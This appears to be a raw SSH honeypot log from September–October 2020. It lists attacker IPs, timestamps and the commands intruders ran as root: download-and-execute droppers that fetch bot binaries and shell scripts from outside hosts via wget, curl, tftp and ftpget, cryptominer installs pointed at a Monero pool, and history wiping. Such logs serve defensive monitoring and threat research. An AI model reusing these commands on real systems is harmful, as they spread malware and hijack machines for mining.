pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp -r pipe2.sh -g 37.49.224.207; chmod 777 pipe2.sh; sh pipe2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.49.224.207 pipe1.sh pipe1.sh; sh pipe1.sh; rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://37.49.224.207/pipe.sh curl -O http://37.49.224.207/pipe.sh chmod 777 pipe.sh sh pipe.sh tftp 37.49.224.207 -c get pipe.sh chmod 777 pipe.sh sh pipe.sh tftp -r pipe2.sh -g 37.49.224.207 chmod 777 pipe2.sh sh pipe2.sh ftpget -v -u anonymous -p anonymous -P 21 37.49.224.207 pipe1.sh pipe1.sh sh pipe1.sh rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh rm -rf * From 134.122.124.220 21-Sep-2020 17:22:52 ssh2 root Exec wget http://164.90.154.53/bins/Formula.x86; chmod 777 Formula.x86; ./Formula.x86 wget http://164.90.154.53/bins/Formula.x86 chmod 777 Formula.x86 ./Formula.x86 From 82.205.17.172 21-Sep-2020 20:23:09 ssh2 root ls nproc ls ls ls From 82.205.17.172 21-Sep-2020 20:26:56 ssh2 root perl test1.pl cd test1.pl ls perl network.pl cd network.pl ld ls cd From 103.136.251.145 22-Sep-2020 10:03:12 ssh2 root Exec uname -m uname -m From 34.87.244.114 22-Sep-2020 12:03:28 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; wget nasapaul.com/cnrig ; chmod 777 cnrig ; /cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B cat /etc/issue cd /tmp wget 185.239.242.92/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* curl -O wget 185.239.242.92/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* wget 178.255.101.213/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 178.255.101.213/bot.pl perl bot.pl rm -rf bot.pl history -c wget nasapaul.com/cnrig chmod 777 cnrig /cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B From 82.205.7.139 22-Sep-2020 13:09:17 ssh2 root yum install -y python3 yum update -y yum install -y python3 install -y python3 curl -O https://www.python.org/ftp/python/3.8.1/Python-3.8.1.tgz wget http://www.python.org/ftp/python/2.7.3/Python-2.7.3.tgz From 45.148.10.65 22-Sep-2020 14:35:21 ssh2 root Exec cd /tmp; wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo done wget; busybox wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; curl -O http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo molov13371@tg; nc 1 1; cd /tmp wget http://172.245.205.137/x86_64 chmod 777 * ./x86_64 roots echo done wget busybox wget http://172.245.205.137/x86_64 chmod 777 * ./x86_64 roots curl -O http://172.245.205.137/x86_64 chmod 777 * ./x86_64 roots echo molov13371@tg nc 1 1 From 94.54.197.172 22-Sep-2020 17:08:32 ssh2 root ls nproc yum sudo From 94.54.197.172 22-Sep-2020 17:11:11 ssh2 root egrep -i '^flags.*(vmx|svm)' /proc/cpuinfo | wc -l hostnamectl | egrep "Operating System" | cut -f2 -d":" | cut -f2 -d " " hostnamectl | grep "Operating System" | cut -f2 -d":" | cut -f2 -d " " sudo apt-get install vim curl genisoimage -y From 94.54.197.172 22-Sep-2020 17:12:57 ssh2 root dnf install snapd ln -s /var/lib/snapd/snap /snap python -v From 94.54.197.172 22-Sep-2020 17:13:46 ssh2 root ls ipcalc.pl cat ipcalc.pl cat test.pl cat test1.pl cat reglas.pl nano From 94.54.197.172 22-Sep-2020 17:15:17 ssh2 root vi ? helpe help su s s ~ ? helpe From 94.54.197.172 22-Sep-2020 17:16:04 ssh2 root cat /etc/asterisk/users.conf cd /etc/ ls ls cpan perl reglas.pl chmod * From 94.54.197.172 22-Sep-2020 17:17:34 ssh2 root Mail cd Mail ls From 35.221.230.220 22-Sep-2020 17:19:06 ssh2 root Exec /ip cloud print /ip cloud print perl ipcalc.pl ./ipcalc.pl From 45.14.224.250 23-Sep-2020 11:57:09 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://45.14.224.118/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 45.14.224.118 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 45.14.224.118; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://45.14.224.118/Percocetbins.sh chmod 777 Percocetbins.sh sh Percocetbins.sh tftp 45.14.224.118 -c get Percocettftp1.sh chmod 777 Percocettftp1.sh sh Percocettftp1.sh tftp -r Percocettftp2.sh -g 45.14.224.118 chmod 777 Percocettftp2.sh sh Percocettftp2.sh rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh rm -rf * From 172.245.7.189 23-Sep-2020 16:37:29 ssh2 root Exec wget http://107.175.87.103/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 Servers; rm -rf Astra.* ; history -c wget http://107.175.87.103/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 Servers rm -rf Astra.* history -c From 172.252.180.10 23-Sep-2020 18:17:51 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; wget nasapaul.com/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B cat /etc/issue cd /tmp wget 185.239.242.92/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* curl -O wget 185.239.242.92/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* wget 178.255.101.213/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 178.255.101.213/bot.pl perl bot.pl rm -rf bot.pl history -c wget nasapaul.com/cnrig chmod 777 cnrig ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B From 104.131.88.115 23-Sep-2020 20:50:23 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.150/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 194.15.36.150 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 194.15.36.150; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.15.36.150 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.15.36.150/bins.sh chmod +x bins.sh sh bins.sh tftp 194.15.36.150 -c get tftp1.sh chmod +x tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 194.15.36.150 chmod +x tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 194.15.36.150 ftp1.sh ftp1.sh sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh From 185.6.17.196 23-Sep-2020 23:36:34 ssh2 root hostnamectl | egrep "Operating System" | cut -f2 -d":" | cut -f2 -d " "hostnamectl | egrep "Operating System" | cut -f2 -d":" | cut -f2 -d " " hostnamectl | egrep "Operating System" | cut -f2 -d":" | cut -f2 -d " " From 104.131.11.149 23-Sep-2020 23:36:51 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://194.15.36.150/bins.sh; cat bins.sh > s0354f; chmod +x s0354f; ./s0354f; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://194.15.36.150/bins.sh cat bins.sh > s0354f chmod +x s0354f ./s0354f history -c ls From 207.154.242.83 24-Sep-2020 00:48:29 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.150/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 194.15.36.150 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 194.15.36.150; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.15.36.150 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.15.36.150/bins.sh chmod +x bins.sh sh bins.sh tftp 194.15.36.150 -c get tftp1.sh chmod +x tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 194.15.36.150 chmod +x tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 194.15.36.150 ftp1.sh ftp1.sh sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh From 161.35.160.121 24-Sep-2020 02:44:15 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://192.210.239.115/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 192.210.239.115 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 192.210.239.115; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://192.210.239.115/yoyobins.sh chmod 777 yoyobins.sh sh yoyobins.sh tftp 192.210.239.115 -c get yoyotftp1.sh chmod 777 yoyotftp1.sh sh yoyotftp1.sh tftp -r yoyotftp2.sh -g 192.210.239.115 chmod 777 yoyotftp2.sh sh yoyotftp2.sh rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh rm -rf * From 146.255.74.22 24-Sep-2020 22:37:27 ssh2 root w cd /home ls nproc ifconfgi ifconfig ls -a From 211.198.205.57 24-Sep-2020 22:40:21 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" cd .ssh ls From 211.198.205.57 24-Sep-2020 22:40:40 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" cd ls From 141.98.81.154 24-Sep-2020 22:43:31 ssh2 root curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python - From 45.148.10.65 24-Sep-2020 22:54:36 ssh2 root Exec nc 1 1; cd /tmp; wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo done wget; busybox wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; curl -O http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo molov13371@tg; nc 1 1; nc 1 1 cd /tmp wget http://172.245.205.137/x86_64 chmod 777 * ./x86_64 roots echo done wget busybox wget http://172.245.205.137/x86_64 chmod 777 * ./x86_64 roots curl -O http://172.245.205.137/x86_64 chmod 777 * ./x86_64 roots echo molov13371@tg nc 1 1 From 167.172.59.143 24-Sep-2020 23:39:39 ssh2 root Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python - yum install python apt-get install python apt-get install python install python pythonvel/speedtest-cli/master/speedtest.py install python install python pythonvel/speedtest-cli/master/speedtest.py python install python pythonvel/speedtest-cli/master/speedtest.py install python install python pythonvel/speedtest-cli/master/speedtest.py install python install python pythonvel/speedtest-cli/master/speedtest.py python install python pythonvel/speedtest-cli/master/speedtest.py python install curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python - apt-get install curl curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python - history -c From 211.198.205.57 24-Sep-2020 23:43:21 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" apt-get istall yum From 211.198.205.57 24-Sep-2020 23:43:35 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" apt-get install yum ls w history 0c history -c From 193.228.91.11 26-Sep-2020 06:14:38 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.94/uDvrLib.sh; curl -O http://45.145.185.94/uDvrLib.sh; chmod 777 uDvrLib.sh; sh uDvrLib.sh; tftp 45.145.185.94 -c get v14tftp.sh; chmod 777 v14tftp.sh; sh v14tftp.sh; tftp -r v13tftp.sh -g 45.145.185.94; chmod 777 v13tftp.sh; sh v13tftp.sh; rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.145.185.94/uDvrLib.sh curl -O http://45.145.185.94/uDvrLib.sh chmod 777 uDvrLib.sh sh uDvrLib.sh tftp 45.145.185.94 -c get v14tftp.sh chmod 777 v14tftp.sh sh v14tftp.sh tftp -r v13tftp.sh -g 45.145.185.94 chmod 777 v13tftp.sh sh v13tftp.sh rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh rm -rf * From 206.189.124.27 27-Sep-2020 04:48:35 ssh2 root Exec cd /var/run || cd /mnt || cd /root || cd /; wget http://192.210.239.115/pXdN91.sh; chmod 777 pXdN91.sh; sh pXdN91.sh; tftp 192.210.239.115 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.210.239.115; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cd /var/run || cd /mnt || cd /root || cd / wget http://192.210.239.115/pXdN91.sh chmod 777 pXdN91.sh sh pXdN91.sh tftp 192.210.239.115 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 192.210.239.115 chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 13.92.134.70 27-Sep-2020 04:50:47 ssh2 root Exec echo $UID echo $UID From 104.248.235.138 27-Sep-2020 08:12:08 ssh2 root Exec ccat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://194.15.36.34/dayum0x1a5sfd15as1fa.sh; cat dayum0x1a5sfd15as1fa.sh > josdf99exx0; chmod +x josdf99exx0; ./josdf99exx0; history -c ccat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://194.15.36.34/dayum0x1a5sfd15as1fa.sh cat dayum0x1a5sfd15as1fa.sh > josdf99exx0 chmod +x josdf99exx0 ./josdf99exx0 history -c From 194.180.224.103 27-Sep-2020 13:23:46 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.97/pipe.sh; curl -O http://194.180.224.97/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp 194.180.224.97 -c get pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp -r pipe2.sh -g 194.180.224.97; chmod 777 pipe2.sh; sh pipe2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.97 pipe1.sh pipe1.sh; sh pipe1.sh; rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.180.224.97/pipe.sh curl -O http://194.180.224.97/pipe.sh chmod 777 pipe.sh sh pipe.sh tftp 194.180.224.97 -c get pipe.sh chmod 777 pipe.sh sh pipe.sh tftp -r pipe2.sh -g 194.180.224.97 chmod 777 pipe2.sh sh pipe2.sh ftpget -v -u anonymous -p anonymous -P 21 194.180.224.97 pipe1.sh pipe1.sh sh pipe1.sh rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh rm -rf * From 64.225.11.61 28-Sep-2020 13:59:00 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://194.15.36.150/bins.sh; cat bins.sh > s0354f; chmod +x s0354f; ./s0354f; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://194.15.36.150/bins.sh cat bins.sh > s0354f chmod +x s0354f ./s0354f history -c From 165.246.41.42 29-Sep-2020 00:18:27 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp wget 193.239.147.156/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* curl -O wget 193.239.147.156/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* wget 193.239.147.156/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 193.239.147.156/bot.pl perl bot.pl rm -rf bot.pl history -c Exec cat /etc/issue ; cd /tmp ; wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp wget 193.239.147.156/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* curl -O wget 193.239.147.156/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* wget 193.239.147.156/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 193.239.147.156/bot.pl perl bot.pl rm -rf bot.pl history -c From 165.246.41.42 29-Sep-2020 00:33:19 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp wget 193.239.147.156/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* curl -O wget 193.239.147.156/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* wget 193.239.147.156/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 193.239.147.156/bot.pl perl bot.pl rm -rf bot.pl history -c From 167.99.93.124 29-Sep-2020 01:02:23 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://172.245.156.101/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 172.245.156.101 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 172.245.156.101; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://172.245.156.101/yoyobins.sh chmod 777 yoyobins.sh sh yoyobins.sh tftp 172.245.156.101 -c get yoyotftp1.sh chmod 777 yoyotftp1.sh sh yoyotftp1.sh tftp -r yoyotftp2.sh -g 172.245.156.101 chmod 777 yoyotftp2.sh sh yoyotftp2.sh rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh rm -rf * From 139.59.11.66 30-Sep-2020 01:12:25 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://scan.kreatr00t3d.site/xZTYFDBXVSDVS456/HashtagFreeInternet.x86; cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd; chmod +x as0f5wq1dv0sw514qwd; ./as0f5wq1dv0sw514qwd Rooted.VPS; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://scan.kreatr00t3d.site/xZTYFDBXVSDVS456/HashtagFreeInternet.x86 cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd chmod +x as0f5wq1dv0sw514qwd ./as0f5wq1dv0sw514qwd Rooted.VPS history -c From 2.57.122.186 30-Sep-2020 03:07:31 ssh2 root Exec nc 1 1;cat /etc/issue; cd /tmp; wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo done wget; busybox wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; curl -O http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo molov13371@tg; nc 1 1; nc 1 1 cat /etc/issue cd /tmp wget http://172.245.205.137/x86_64 chmod 777 * ./x86_64 roots echo done wget busybox wget http://172.245.205.137/x86_64 chmod 777 * ./x86_64 roots curl -O http://172.245.205.137/x86_64 chmod 777 * ./x86_64 roots echo molov13371@tg nc 1 1 From 193.228.91.108 30-Sep-2020 06:36:29 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86; tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.109/Otpzl/7rtya.x86 curl -O http://193.228.91.109/Otpzl/7rtya.x86 chmod +x 7rtya.x86 ./7rtya.x86 Exploit.x86 rm -rf 7rtya.x86 tftp 193.228.91.109 -c get 7rtya.x86 chmod +x 7rtya.x86 ./7rtya.x86 TFTP.Exploit.x86 rm -rf 7rtya.x86 history -c From 178.157.12.249 30-Sep-2020 09:26:15 ssh2 root Exec cat /etc/issue ; wget 35.233.20.236/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 35.233.20.236/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue wget 35.233.20.236/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 35.233.20.236/bot.pl perl bot.pl rm -rf bot.pl history -c From 5.14.57.253 30-Sep-2020 11:56:07 ssh2 root uname -a lscpu w crontab -l ls -a ls -la ls nano reglas.pl vi reglas.pl vim halt From 45.148.10.65 30-Sep-2020 14:28:09 ssh2 root Exec nc 1 1;cat /etc/issue; nc 1 1 cat /etc/issue From 104.131.110.155 30-Sep-2020 19:47:49 ssh2 root Exec wget http://107.175.87.103/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 Aws; rm -rf Astra.* ; history -c wget http://107.175.87.103/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 Aws rm -rf Astra.* history -c From 193.228.91.123 1-Oct-2020 04:27:41 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/pwnInfect.sh; curl -O http://37.49.224.207/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 37.49.224.207 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 37.49.224.207; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.49.224.207 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://37.49.224.207/pwnInfect.sh curl -O http://37.49.224.207/pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp 37.49.224.207 -c get pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp -r pwnInfect2.sh -g 37.49.224.207 chmod 777 pwnInfect2.sh sh pwnInfect2.sh ftpget -v -u anonymous -p anonymous -P 21 37.49.224.207 pwnInfect1.sh pwnInfect1.sh sh pwnInfect1.sh rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh rm -rf * From 37.46.150.211 2-Oct-2020 11:44:00 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://193.239.147.75/Vividbins.sh; chmod 777 Vividbins.sh; sh Vividbins.sh; tftp 193.239.147.75 -c get Vividtftp1.sh; chmod 777 Vividtftp1.sh; sh Vividtftp1.sh; tftp -r Vividtftp2.sh -g 193.239.147.75; chmod 777 Vividtftp2.sh; sh Vividtftp2.sh; rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://193.239.147.75/Vividbins.sh chmod 777 Vividbins.sh sh Vividbins.sh tftp 193.239.147.75 -c get Vividtftp1.sh chmod 777 Vividtftp1.sh sh Vividtftp1.sh tftp -r Vividtftp2.sh -g 193.239.147.75 chmod 777 Vividtftp2.sh sh Vividtftp2.sh rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh rm -rf * From 45.153.203.104 2-Oct-2020 12:51:21 ssh2 root Exec nc 1 1; echo lmfao goodbye; cat /etc/issue; pkill xmrig; pkill xmrigMiner; pkill xmrminer; pkill x86; pkill x86_64; pkill storm; pkill a; nc 1 1 echo lmfao goodbye cat /etc/issue pkill xmrig pkill xmrigMiner pkill xmrminer pkill x86 pkill x86_64 pkill storm pkill a Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 45.153.203.104 2-Oct-2020 12:52:29 ssh2 root Exec nc 1 1; echo lmfao goodbye; cat /etc/issue; pkill xmrig; pkill xmrigMiner; pkill xmrminer; pkill x86; pkill x86_64; pkill storm; pkill a; nc 1 1 echo lmfao goodbye cat /etc/issue pkill xmrig pkill xmrigMiner pkill xmrminer pkill x86 pkill x86_64 pkill storm pkill a From 185.132.53.14 2-Oct-2020 17:36:31 ssh2 root Exec wget http://192.210.214.51/okami.x86; chmod 777 okami.x86; ./okami.x86 roots; rm -rf okami.x86; history -c wget http://192.210.214.51/okami.x86 chmod 777 okami.x86 ./okami.x86 roots rm -rf okami.x86 history -c From 45.148.10.186 3-Oct-2020 00:03:10 ssh2 root Exec nc 1 1;cat /etc/issue; wget https://nasapaul.com/cnrig; chmod 777 *; ./cnrig; echo lol fuck boy lolololol nc 1 1 cat /etc/issue wget https://nasapaul.com/cnrig chmod 777 * ./cnrig echo lol fuck boy lolololol From 34.68.191.164 3-Oct-2020 10:21:52 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 193.239.147.156/sora.x86 ; chmod 777 sora.x86 ; ./sora.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 193.239.147.156/sora.x86 ; chmod 777 sora.x86 ; ./sora.x86 autorooter.x86 ; rm -rf nigga* ; wget 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; wget 193.239.147.156/sora.mips ; chmod 777 sora.mips ; ./sora.mips autorooter.mips ; wget 193.239.147.156/sora.arm ; chmod 777 sora.arm ; ./sora.arm autorooter.arm ; wget 193.239.147.156/sora.arm5 ; chmod 777 sora.arm5 ; ./sora.arm5 autorooter.arm5 ; wget 193.239.147.156/sora.arm6 ; chmod 777 sora.arm6 ; ./sora.arm6 autorooter.arm6 ; wget 193.239.147.156/sora.arm7 ; chmod 777 sora.arm7 ; ./sora.arm7 autorooter.arm7 ; wget 193.239.147.156/sora.mpsl ; chmod 777 sora.mpsl ; ./sora.mpsl autorooter.mpsl cat /etc/issue cd /tmp wget 193.239.147.156/sora.x86 chmod 777 sora.x86 ./sora.x86 autorooter.x86 rm -rf nigga* curl -O wget 193.239.147.156/sora.x86 chmod 777 sora.x86 ./sora.x86 autorooter.x86 rm -rf nigga* wget 193.239.147.156/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 193.239.147.156/bot.pl perl bot.pl 